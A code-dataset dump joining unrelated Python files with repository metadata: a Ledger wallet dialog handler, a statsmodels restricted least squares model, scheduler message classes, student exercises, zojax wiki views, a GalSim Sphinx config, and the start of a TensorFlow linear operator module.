    # get_setup emit a signal and then wait on self.done until the connected
    # dialog slot stores a result and sets the event.
    setup_signal = pyqtSignal()
    auth_signal = pyqtSignal(object)

    def __init__(self, win):
        super(Ledger_Handler, self).__init__(win, 'Ledger')
        self.setup_signal.connect(self.setup_dialog)
        self.auth_signal.connect(self.auth_dialog)

    def word_dialog(self, msg):
        """Prompt for input in a password-style box.

        Stores the entry in self.word (None on cancel) and releases the
        waiter via self.done.
        """
        response = QInputDialog.getText(self.top_level_window(), "Ledger Wallet Authentication", msg, QLineEdit.Password)
        if not response[1]:
            self.word = None
        else:
            self.word = str(response[0])
        self.done.set()

    def message_dialog(self, msg):
        """Show a modal status dialog containing `msg`."""
        self.clear_dialog()
        self.dialog = dialog = WindowModalDialog(self.top_level_window(), _("Ledger Status"))
        l = QLabel(msg)
        vbox = QVBoxLayout(dialog)
        vbox.addWidget(l)
        dialog.show()

    def auth_dialog(self, data):
        """Run the 2FA dialog and store the entered PIN in self.word."""
        try:
            from .auth2fa import LedgerAuthDialog
        except ImportError as e:
            # Without the optional auth2fa module, just show the error.
            self.message_dialog(str(e))
            return
        dialog = LedgerAuthDialog(self, data)
        dialog.exec_()
        self.word = dialog.pin
        self.done.set()

    def get_auth(self, data):
        """Blocking call: request authentication on the GUI and wait for the word."""
        self.done.clear()
        self.auth_signal.emit(data)
        self.done.wait()
        return self.word

    def get_setup(self):
        """Blocking call: trigger the setup dialog and wait for it to finish."""
        self.done.clear()
        self.setup_signal.emit()
        self.done.wait()
        return

    def setup_dialog(self):
        # Device initialization from the client is not supported here.
        self.show_error(_('Initialization of Ledger HW devices is currently disabled.'))
"[email protected]"
] | |
7b5d81cbcf4171c2438e06c851ff4e7d2d6a0401 | 76a8ea60480331f0f61aeb61de55be9a6270e733 | /downloadable-site-packages/statsmodels/sandbox/rls.py | 412cc4d05051951d88945554d1d310bacbbc9c20 | [
"MIT"
] | permissive | bhagyas/Pyto | cd2ec3f35bec703db4ac29b56d17abc4bf03e375 | 907024a9b3e04a2a9de54976778c0e1a56b7b83c | refs/heads/master | 2022-11-19T13:05:07.392454 | 2020-07-21T17:33:39 | 2020-07-21T17:33:39 | 281,886,535 | 2 | 0 | MIT | 2020-07-23T07:48:03 | 2020-07-23T07:48:02 | null | UTF-8 | Python | false | false | 5,136 | py | """Restricted least squares
from pandas
License: Simplified BSD
"""
import numpy as np
from statsmodels.regression.linear_model import GLS, RegressionResults
class RLS(GLS):
    """
    Restricted general least squares model that handles linear constraints

    Parameters
    ----------
    endog: array_like
        n length array containing the dependent variable
    exog: array_like
        n-by-p array of independent variables
    constr: array_like
        k-by-p array of linear constraints
    param (0.): array_like or scalar
        p-by-1 array (or scalar) of constraint parameters
    sigma (None): scalar or array_like
        The weighting matrix of the covariance. No scaling by default (OLS).
        If sigma is a scalar, then it is converted into an n-by-n diagonal
        matrix with sigma as each diagonal element.
        If sigma is an n-length array, then it is assumed to be a diagonal
        matrix with the given sigma on the diagonal (WLS).

    Notes
    -----
    endog = exog * beta + epsilon
    weights' * constr * beta = param

    See Greene and Seaks, "The Restricted Least Squares Estimator:
    A Pedagogical Note", The Review of Economics and Statistics, 1991.
    """

    def __init__(self, endog, exog, constr, param=0., sigma=None):
        N, Q = exog.shape
        constr = np.asarray(constr)
        # Normalize the constraint matrix to K rows (constraints) by
        # P columns (coefficients).
        if constr.ndim == 1:
            K, P = 1, constr.shape[0]
        else:
            K, P = constr.shape
        if Q != P:
            raise Exception('Constraints and design do not align')
        self.ncoeffs = Q
        self.nconstraint = K
        self.constraint = constr
        # Broadcast a scalar constraint parameter to one value per constraint.
        if np.isscalar(param) and K > 1:
            param = np.ones((K,)) * param
        self.param = param
        # Build sigma and the whitening factor used by the GLS machinery.
        if sigma is None:
            sigma = 1.
        if np.isscalar(sigma):
            sigma = np.ones(N) * sigma
        sigma = np.squeeze(sigma)
        if sigma.ndim == 1:
            self.sigma = np.diag(sigma)
            # NOTE(review): uses sqrt(sigma) on the diagonal while the dense
            # branch below whitens with cholesky(pinv(sigma)); one would
            # expect sigma**-0.5 for consistency -- kept as-is, confirm.
            self.cholsigmainv = np.diag(np.sqrt(sigma))
        else:
            self.sigma = sigma
            self.cholsigmainv = np.linalg.cholesky(np.linalg.pinv(self.sigma)).T
        # super(GLS, ...) intentionally skips GLS.__init__ and calls its
        # base-class initializer; sigma handling was already done above.
        super(GLS, self).__init__(endog, exog)

    # Lazily computed cache for the rwexog property.
    _rwexog = None

    @property
    def rwexog(self):
        """Whitened exogenous variables augmented with restrictions"""
        if self._rwexog is None:
            P = self.ncoeffs
            K = self.nconstraint
            # Augmented (P+K)-square system: [X'X  C'; C  0]
            design = np.zeros((P + K, P + K))
            design[:P, :P] = np.dot(self.wexog.T, self.wexog) #top left
            constr = np.reshape(self.constraint, (K, P))
            design[:P, P:] = constr.T #top right partition
            design[P:, :P] = constr #bottom left partition
            design[P:, P:] = np.zeros((K, K)) #bottom right partition
            self._rwexog = design
        return self._rwexog

    _inv_rwexog = None

    @property
    def inv_rwexog(self):
        """Inverse of self.rwexog"""
        if self._inv_rwexog is None:
            self._inv_rwexog = np.linalg.inv(self.rwexog)
        return self._inv_rwexog

    _rwendog = None

    @property
    def rwendog(self):
        """Whitened endogenous variable augmented with restriction parameters"""
        if self._rwendog is None:
            P = self.ncoeffs
            K = self.nconstraint
            # Right-hand side of the augmented system: [X'y; param]
            response = np.zeros((P + K,))
            response[:P] = np.dot(self.wexog.T, self.wendog)
            response[P:] = self.param
            self._rwendog = response
        return self._rwendog

    _ncp = None

    @property
    def rnorm_cov_params(self):
        """Parameter covariance under restrictions"""
        if self._ncp is None:
            P = self.ncoeffs
            # Top-left P-by-P corner of the inverse augmented design.
            self._ncp = self.inv_rwexog[:P, :P]
        return self._ncp

    _wncp = None

    @property
    def wrnorm_cov_params(self):
        """
        Heteroskedasticity-consistent parameter covariance

        Used to calculate White standard errors.
        """
        if self._wncp is None:
            df = self.df_resid
            pred = np.dot(self.wexog, self.coeffs)
            # Diagonal matrix of squared residuals (the sandwich "meat").
            eps = np.diag((self.wendog - pred) ** 2)
            sigmaSq = np.sum(eps)
            pinvX = np.dot(self.rnorm_cov_params, self.wexog.T)
            self._wncp = np.dot(np.dot(pinvX, eps), pinvX.T) * df / sigmaSq
        return self._wncp

    _coeffs = None

    @property
    def coeffs(self):
        """Estimated parameters"""
        if self._coeffs is None:
            # Solve the augmented system; the first ncoeffs entries are the
            # coefficients, the remaining K are the Lagrange multipliers.
            betaLambda = np.dot(self.inv_rwexog, self.rwendog)
            self._coeffs = betaLambda[:self.ncoeffs]
        return self._coeffs

    def fit(self):
        """Return a RegressionResults wrapper around the restricted fit."""
        rncp = self.wrnorm_cov_params
        lfit = RegressionResults(self, self.coeffs, normalized_cov_params=rncp)
        return lfit
if __name__=="__main__":
    # Example / smoke test: expects ./rlsdata.txt in the working directory.
    import statsmodels.api as sm
    dta = np.genfromtxt('./rlsdata.txt', names=True)
    # Design: Y, Y^2 and the four region dummies NE/NC/W/S, plus a constant.
    design = np.column_stack((dta['Y'],dta['Y']**2,dta[['NE','NC','W','S']].view(float).reshape(dta.shape[0],-1)))
    design = sm.add_constant(design, prepend=True)
    # Constraint [0,0,0,1,1,1,1] with the default param=0 forces the four
    # regional coefficients to sum to zero.
    rls_mod = RLS(dta['G'],design, constr=[0,0,0,1,1,1,1])
    rls_fit = rls_mod.fit()
    print(rls_fit.params)
| [
"[email protected]"
] | |
8b7311824ab9a23ac88a7ac5fed9d86293761a1f | 6d5d161269e66345a32e0e221f2dbce2a07c742a | /async_sched/server/messages.py | afca8f5818cc66f2f69f7051f2ae055bd29a5126 | [
"MIT"
] | permissive | justengel/async_sched | d286c79eb6a705769aa8e59da7508d5995acb523 | f980722d51d15025522b2265426b0188ff368418 | refs/heads/master | 2022-11-07T18:24:50.843013 | 2020-07-01T02:39:55 | 2020-07-01T02:39:55 | 268,154,385 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | from typing import List
from serial_json import DataClass, field
from ..schedule import Schedule
# Public protocol message types (DataClass is re-exported for convenience).
__all__ = ['DataClass', 'Message', 'Error', 'Quit', 'Update', 'RunCommand', 'ScheduleCommand',
           'RunningSchedule', 'ListSchedules', 'StopSchedule']
class Message(DataClass):
    """Plain informational message carrying a single text field."""
    message: str
class Error(DataClass):
    """Error report carrying a single text field."""
    message: str
class Quit(DataClass):
    """Quit message type; carries no fields."""
    pass
class Update(DataClass):
    """Update message naming a module (empty string by default)."""
    module_name: str = ''
class RunCommand(DataClass):
    """Command naming a callback to run with the given positional/keyword args."""
    callback_name: str
    args: tuple = field(default_factory=tuple)
    kwargs: dict = field(default_factory=dict)
class ScheduleCommand(DataClass):
    """Command bundling a named Schedule with the callback it should trigger."""
    name: str
    schedule: Schedule
    callback_name: str
    args: tuple = field(default_factory=tuple)
    kwargs: dict = field(default_factory=dict)
class RunningSchedule(DataClass):
    """A named Schedule entry, as reported inside ListSchedules."""
    name: str
    schedule: Schedule
class ListSchedules(DataClass):
    """Container message holding a list of RunningSchedule entries."""
    schedules: List[RunningSchedule] = field(default_factory=list)
class StopSchedule(DataClass):
    """Message naming the schedule to stop."""
    name: str
| [
"[email protected]"
] | |
c925362f7a177e0811dfb0b9035d7ffefbf1ec34 | 5c6ccc082d9d0d42a69e22cfd9a419a5b87ff6cd | /coursera/pythonHse/fourth/4.py | b721d875cacc3f42d7207d20fca81d8db4118054 | [] | no_license | kersky98/stud | 191c809bacc982c715d9610be282884a504d456d | d395a372e72aeb17dfad5c72d46e84dc59454410 | refs/heads/master | 2023-03-09T20:47:25.082673 | 2023-03-01T08:28:32 | 2023-03-01T08:28:32 | 42,979,807 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,342 | py | # Даны два действительных числа x и y. Проверьте, принадлежит ли точка с
# координатами (x,y) заштрихованному квадрату (включая его границу). Если
# точка принадлежит квадрату, выведите слово YES, иначе выведите слово NO.
# На рисунке сетка проведена с шагом 1.
# Решение должно содержать функцию IsPointInSquare(x, y), возвращающую True,
# если точка принадлежит квадрату и False, если не принадлежит. Основная
# программа должна считать координаты точки, вызвать функцию IsPointInSquare
# и в зависимости от возвращенного значения вывести на экран необходимое
# сообщение. Функция IsPointInSquare не должна содержать инструкцию if.
import sys
# Read the point coordinates, one per input line.
x = float(input())
y = float(input())
# Machine epsilon: pads the boundary comparison against float noise.
e = sys.float_info.epsilon
def IsPointInSquare(x, y, e=sys.float_info.epsilon):
    """Return True when (x, y) lies in the closed square [-1, 1] x [-1, 1].

    The bounds are padded by `e` (machine epsilon by default, generalized to
    a keyword parameter so the tolerance is configurable and the function is
    testable without the module-level global).  Per the exercise statement
    the implementation deliberately contains no `if`.
    """
    # Chained comparisons check both bounds of each coordinate at once.
    res = -1 - e < x < 1 + e and -1 - e < y < 1 + e
    return res
# Report membership in the words required by the task statement.
if IsPointInSquare(x, y):
    print('YES')
else:
    print('NO')
| [
"[email protected]"
] | |
d603fc4e9d43b4652a8ac0e851fac084cd7232b0 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_1/r4ghu/count.py | 41bfd1280434461d73ff3977ca2f3160ac163ca2 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 688 | py | input = open('input.txt','r')
# Python 2 script: for each test case in input.txt, find the first multiple
# of n after which all ten digits have appeared (or 'INSOMNIA' for n=0) and
# write "Case #i: ..." lines to out.txt.
print 'Name of the file:', input.name
results = []
T = int(input.readline())
for t in range(T):
    dic = {}
    l = []
    n = int(input.readline())
    if n==0:
        # n = 0 never produces new digits.
        results.append('INSOMNIA')
    for i in range(1,25*n):
        # Record every digit of i*n seen so far.
        p = list(str(i*n))
        for j in p:
            if j not in dic.keys():
                dic[j]=1
        l = dic.keys()  # py2: dict.keys() returns a list
        l.sort()
        # Stop at the first multiple after which all ten digits occurred.
        if l==['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']:
            results.append(str(i*n))
            break
input.close()
print len(results),results
out = open('out.txt','w')
for i in range(len(results)):
    out.write('Case #'+str(i+1)+': '+results[i]+'\n')
# NOTE(review): `out` is never closed explicitly (relies on interpreter
# shutdown to flush), and `input` shadows the builtin; indentation above was
# reconstructed from the flattened source -- confirm against the original.
| [
"[[email protected]]"
] | |
ac92c6cc494073720f64ded6d9dfce7c9f5e7603 | cc72013ede1b3bb02c32a3d0d199be4f7986c173 | /ch10/cballmaxheight.py | d1b7e7d7f8bd3735de66883c44cae85de31b5936 | [] | no_license | alextickle/zelle-exercises | b87d2a1476189954565f5cc97ee1448200eb00d4 | b784ff9ed9b2cb1c56e31c1c63f3e2b52fa37875 | refs/heads/master | 2021-01-19T00:33:19.132238 | 2017-09-14T23:35:35 | 2017-09-14T23:35:35 | 87,182,609 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 645 | py | from classProjectile import Projectile
def getInputs():
    """Prompt the user for launch angle, velocity, height and time step.

    Returns the four values as the tuple (a, v, h, t).  Python 2: input()
    evaluates the typed text, so numeric entries come back as numbers.
    """
    a = input("Enter the launch angle (in degrees): ")
    v = input("Enter the initial velocity (in meters/sec): ")
    h = input("Enter the initial height (in meters): ")
    # Fixed typo in the user-facing prompt: "initerval" -> "interval".
    t = input("Enter the time interval between position calculations: ")
    return a, v, h, t
def main():
    """Simulate the cannonball flight and report range and maximum height."""
    angle, vel, h0, time = getInputs()
    cball = Projectile(angle, vel, h0)
    # Track the maximum height reached during the flight.
    # NOTE(review): starts at 0 rather than h0, so a purely descending
    # trajectory would report a maximum below the launch height -- confirm.
    maxheight = 0
    # Step the simulation until the projectile reaches the ground.
    while cball.getY() >= 0:
        cball.update(time)
        if cball.getY() > maxheight:
            maxheight = cball.getY()
    print "\nDistance traveled: %0.1f meters." % (cball.getX())
    print "\nMaximum height: %0.1f meters." % (maxheight)
# Runs unconditionally (no __main__ guard), also on import.
main()
| [
"[email protected]"
] | |
cacda09aaaef2e4170fc9593a18b9c06078c39cf | 2e7814885646a56ffd3db0883a1c3f790cb9de46 | /src/zojax/wiki/browser/wiki.py | 083aa26c9e5f90104938fd17f906a76c8a3f4019 | [
"ZPL-2.1"
] | permissive | Zojax/zojax.wiki_ | 1afa247c8797ac7316d6689d77d9c61a991eda0b | b0b9a3c3a91ffb725c5ef7e330632f18dab3d75e | refs/heads/master | 2020-04-01T15:33:32.556439 | 2014-01-29T18:31:29 | 2014-01-29T18:31:29 | 2,038,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,643 | py | ##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
$Id$
"""
from zope import component, interface, event, schema
from zope.component import getUtility, getMultiAdapter, queryMultiAdapter
from zope.traversing.browser import absoluteURL
from zope.lifecycleevent import ObjectCreatedEvent
from zope.publisher.interfaces import NotFound
from zope.publisher.interfaces.browser import IBrowserPublisher
from zope.app.container.interfaces import INameChooser
from zojax.richtext.field import RichText
from zojax.content.actions.action import Action
from zojax.statusmessage.interfaces import IStatusMessage
from zojax.layoutform import interfaces, button, Fields, PageletForm
from zojax.wiki.format import generateWikiName
from zojax.wiki.interfaces import _, IWiki, IWikiPage
from zojax.wiki.wikipage import WikiPage
from zojax.wiki.browser.empty import EmptyWikiPage
from zojax.wiki.browser.wikipage import customWidget
from zojax.wiki.browser.interfaces import IManageWikiAction, IAddWikiPageAction
class WikiPublisher(object):
    """Browser publisher for a wiki container.

    Traversal resolves, in order: an existing contained wiki page, a
    registered browser view, and finally an EmptyWikiPage placeholder for
    any name that would be a valid page name but does not exist yet.
    """
    interface.implements(IBrowserPublisher)
    component.adapts(IWiki, interface.Interface)

    def __init__(self, context, request):
        self.context = context
        self.request = request

    def publishTraverse(self, request, name):
        wiki = self.context
        # An existing wiki page always wins.
        if name in wiki:
            return wiki[name]
        # Next, try a registered browser view of that name.
        view = queryMultiAdapter((wiki, request), name=name)
        if view is not None:
            return view
        # Finally, a valid-but-missing page name yields an empty placeholder
        # page so it can be created on first visit.
        try:
            if INameChooser(wiki).checkName(name, WikiPage()):
                return EmptyWikiPage(name, wiki, request)
        except:
            # checkName raises for invalid names; treat those as not found.
            pass
        raise NotFound(self.context, name, request)

    def browserDefault(self, request):
        # The wiki's default view is its FrontPage.
        return self.context, ('FrontPage',)
class ManageWiki(Action):
    """'Manage Wiki' action shown on wiki pages, linking to the wiki's
    management form for users with modify permission."""
    component.adapts(IWikiPage, interface.Interface)
    interface.implements(IManageWikiAction)

    weight = 6
    title = _(u'Manage Wiki')
    contextInterface = IWiki
    permission = 'zojax.ModifyContent'

    @property
    def url(self):
        base = absoluteURL(self.context, self.request)
        return '%s/context.html' % base
class AddWikiPageAction(Action):
    """'Add Wiki Page' action, linking to the add-page form of the wiki
    that contains the current page."""
    component.adapts(IWikiPage, interface.Interface)
    interface.implements(IAddWikiPageAction)

    weight = 10
    title = _(u'Add Wiki Page')
    contextInterface = IWiki
    permission = 'zojax.ModifyWikiContent'

    @property
    def url(self):
        base = absoluteURL(self.context, self.request)
        return '%s/addwikipage.html' % base
class IAddWikiPage(interface.Interface):
    """Schema for the add-wiki-page form: a title plus a rich-text body.

    NOTE(review): field definition order appears intentional (title before
    text, matching the rendered form) — keep the order when editing.
    """

    title = schema.TextLine(
        title = _('Title'),
        description = _('Wiki page title.'),
        required = True)

    # Rich-text body; rendered with a custom widget by AddWikiPageForm.
    text = RichText(
        title = _(u'Page text'),
        description = _(u'Wiki page text.'),
        required = True)
class AddWikiPageForm(PageletForm):
    """Form for creating a new wiki page inside the current wiki."""

    label = _('Add Wiki Page')

    fields = Fields(IAddWikiPage)
    # Render the rich-text body with the project's custom widget.
    fields['text'].widgetFactory = customWidget

    # The form creates a new object, so there is no existing context to edit.
    ignoreContext = True

    @button.buttonAndHandler(_('Create'), name='create',
                             provides=interfaces.IAddButton)
    def createHandler(self, action):
        # Validate input; validation errors are reported through the
        # status-message utility rather than raising.
        data, errors = self.extractData()
        if errors:
            IStatusMessage(self.request).add(
                (self.formErrorsMessage,) + errors, 'formError')
        else:
            # Build the page, announce its creation, then add it to the wiki
            # under a name generated from the title.
            page = WikiPage(title=data['title'])
            page.text = data['text']
            event.notify(ObjectCreatedEvent(page))

            name = generateWikiName(data['title'])
            wiki = self.context
            try:
                wiki[name] = page
                # New pages hang off the wiki's FrontPage in the hierarchy.
                page.parent = wiki['FrontPage']
                IStatusMessage(self.request).add(_('Wiki page has been added.'))
                self.redirect(u'%s/'%name)
            # Python 2 except syntax — this module predates Python 3. Any
            # failure (e.g. name collision) is surfaced as an error message.
            except Exception, err:
                IStatusMessage(self.request).add(err, 'error')

    @button.buttonAndHandler(_('Cancel'), name='cancel',
                             provides=interfaces.ICancelButton)
    def cancelHandler(self, action):
        # Abandon the form and return to the wiki.
        self.redirect(u'./')
| [
"[email protected]"
] | |
e4841e48dd2798ed1c2ba400e9e3a8c6b9d95714 | cb73499c5b15cead88751dfca21cefae81483501 | /docs/conf.py | 6f333b8b3d818eebd843b06f85a9f8c9dc169e27 | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | RichardPflaum/GalSim | dcbabfbdbd41a0ebe909ad3c28e47daabcd92818 | 05060e583b2465ca8e2b258126c2ba8257e358f1 | refs/heads/main | 2023-03-23T05:59:05.349282 | 2021-02-05T23:11:55 | 2021-02-06T00:49:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,740 | py | # Copyright (c) 2012-2020 by the GalSim developers team on GitHub
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
# https://github.com/GalSim-developers/GalSim
#
# GalSim is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
#
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# MJ: I find things work better if it's installed properly and you don't do this.
#
#import os
#import sys
#sys.path.insert(0, os.path.abspath('../galsim'))
# -- Project information -----------------------------------------------------
import galsim
import galsim.roman
import galsim.des
# Sphinx project metadata, shown in page titles/footers.
project = 'GalSim'
copyright = '2019, GalSim-developers'
author = 'GalSim-developers'

# The short X.Y version — derived from the installed package so the docs
# cannot drift from the code being documented.
version = '.'.join(map(str,galsim.__version_info__[:2]))
# The full version, including alpha/beta/rc tags
release = galsim.__version__
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',           # pull documentation from docstrings
    'sphinx.ext.mathjax',           # render LaTeX math in HTML output
    'sphinx.ext.viewcode',          # link docs to highlighted source
    'sphinx.ext.autosectionlabel',  # allow referencing sections by title
    'sphinx.ext.napoleon',          # Google/NumPy-style docstring support
    'sphinx.ext.coverage',          # documentation-coverage reporting
]
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
#language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'any'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# https://michaelgoerz.net/notes/extending-sphinx-napoleon-docstring-sections.html
# -- Extensions to the Napoleon GoogleDocstring class ---------------------
from sphinx.ext.napoleon.docstring import GoogleDocstring
# first, we define new methods for any new sections and add them to the class
def parse_keys_section(self, section):
    """Render a custom 'Keys' docstring section like a fields section."""
    fields = self._consume_fields()
    return self._format_fields('Keys', fields)
GoogleDocstring._parse_keys_section = parse_keys_section
def parse_attributes_section(self, section):
    """Render an 'Attributes' docstring section like a fields section."""
    fields = self._consume_fields()
    return self._format_fields('Attributes', fields)
GoogleDocstring._parse_attributes_section = parse_attributes_section
def parse_class_attributes_section(self, section):
    """Render a custom 'Class Attributes' section like a fields section."""
    fields = self._consume_fields()
    return self._format_fields('Class Attributes', fields)
GoogleDocstring._parse_class_attributes_section = parse_class_attributes_section
# we now patch the parse method to guarantee that the the above methods are
# assigned to the _section dict
def patched_parse(self):
    """Register the extra section parsers, then run the original parser."""
    extra_sections = {
        'keys': self._parse_keys_section,
        'class attributes': self._parse_class_attributes_section,
    }
    self._sections.update(extra_sections)
    self._unpatched_parse()
# Keep a handle on the original parser, then install the patched one so the
# custom sections are registered before every docstring parse.
GoogleDocstring._unpatched_parse = GoogleDocstring._parse
GoogleDocstring._parse = patched_parse
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'GalSimdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'GalSim.tex', 'GalSim Documentation',
'GalSim-developers', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'GalSim', 'GalSim Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'GalSim', 'GalSim Documentation',
author, 'GalSim', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
| [
"[email protected]"
] | |
16a3ede80cdb02e339d6e3f2cf8311c8b6990ec5 | 0d1c1a216b01f6773e751691e9d3e10cc4f27d09 | /tensorflow/contrib/linalg/python/ops/linear_operator_composition.py | a6c9c30d04180656eb136b6fcb82585b77f3b584 | [
"Apache-2.0"
] | permissive | abdo5520/tensorflow | 13c1496e7aa115bba06cda5fc9dc73ba9e4b1694 | 55b01593515817992821423fec19733bca91c918 | refs/heads/master | 2021-01-13T04:05:38.763884 | 2017-01-01T13:10:05 | 2017-01-01T13:10:05 | 77,894,045 | 0 | 1 | null | 2017-01-03T07:28:02 | 2017-01-03T07:28:02 | null | UTF-8 | Python | false | false | 9,894 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Composes one or more `LinearOperators`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.linalg.python.ops import linear_operator
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
__all__ = ["LinearOperatorComposition"]
class LinearOperatorComposition(linear_operator.LinearOperator):
  """Composes one or more `LinearOperators`.

  This operator composes one or more linear operators `[op1,...,opJ]`,
  building a new `LinearOperator` with action defined by:

  ```
  op_composed(x) := op1(op2(...(opJ(x)...))
  ```

  If `opj` acts like [batch] matrix `Aj`, then `op_composed` acts like the
  [batch] matrix formed with the multiplication `A1 A2...AJ`.

  If `opj` has shape `batch_shape_j + [M_j, N_j]`, then we must have
  `N_j = M_{j+1}`, in which case the composed operator has shape equal to
  `broadcast_batch_shape + [M_1, N_J]`, where `broadcast_batch_shape` is the
  mutual broadcast of `batch_shape_j`, `j = 1,...,J`, assuming the intermediate
  batch shapes broadcast.  Even if the composed shape is well defined, the
  composed operator's methods may fail due to lack of broadcasting ability in
  the defining operators' methods.

  ```python
  # Create a 2 x 2 linear operator composed of two 2 x 2 operators.
  operator_1 = LinearOperatorMatrix([[1., 2.], [3., 4.]])
  operator_2 = LinearOperatorMatrix([[1., 0.], [0., 1.]])
  operator = LinearOperatorComposition([operator_1, operator_2])

  operator.to_dense()
  ==> [[1., 2.]
       [3., 4.]]

  operator.shape
  ==> [2, 2]

  operator.log_determinant()
  ==> scalar Tensor

  x = ... Shape [2, 4] Tensor
  operator.apply(x)
  ==> Shape [2, 4] Tensor

  # Create a [2, 3] batch of 4 x 5 linear operators.
  matrix_45 = tf.random_normal(shape=[2, 3, 4, 5])
  operator_45 = LinearOperatorMatrix(matrix_45)

  # Create a [2, 3] batch of 5 x 6 linear operators.
  matrix_56 = tf.random_normal(shape=[2, 3, 5, 6])
  operator_56 = LinearOperatorMatrix(matrix_56)

  # Compose to create a [2, 3] batch of 4 x 6 operators.
  operator_46 = LinearOperatorComposition([operator_45, operator_56])

  # Create a shape [2, 3, 6, 2] vector.
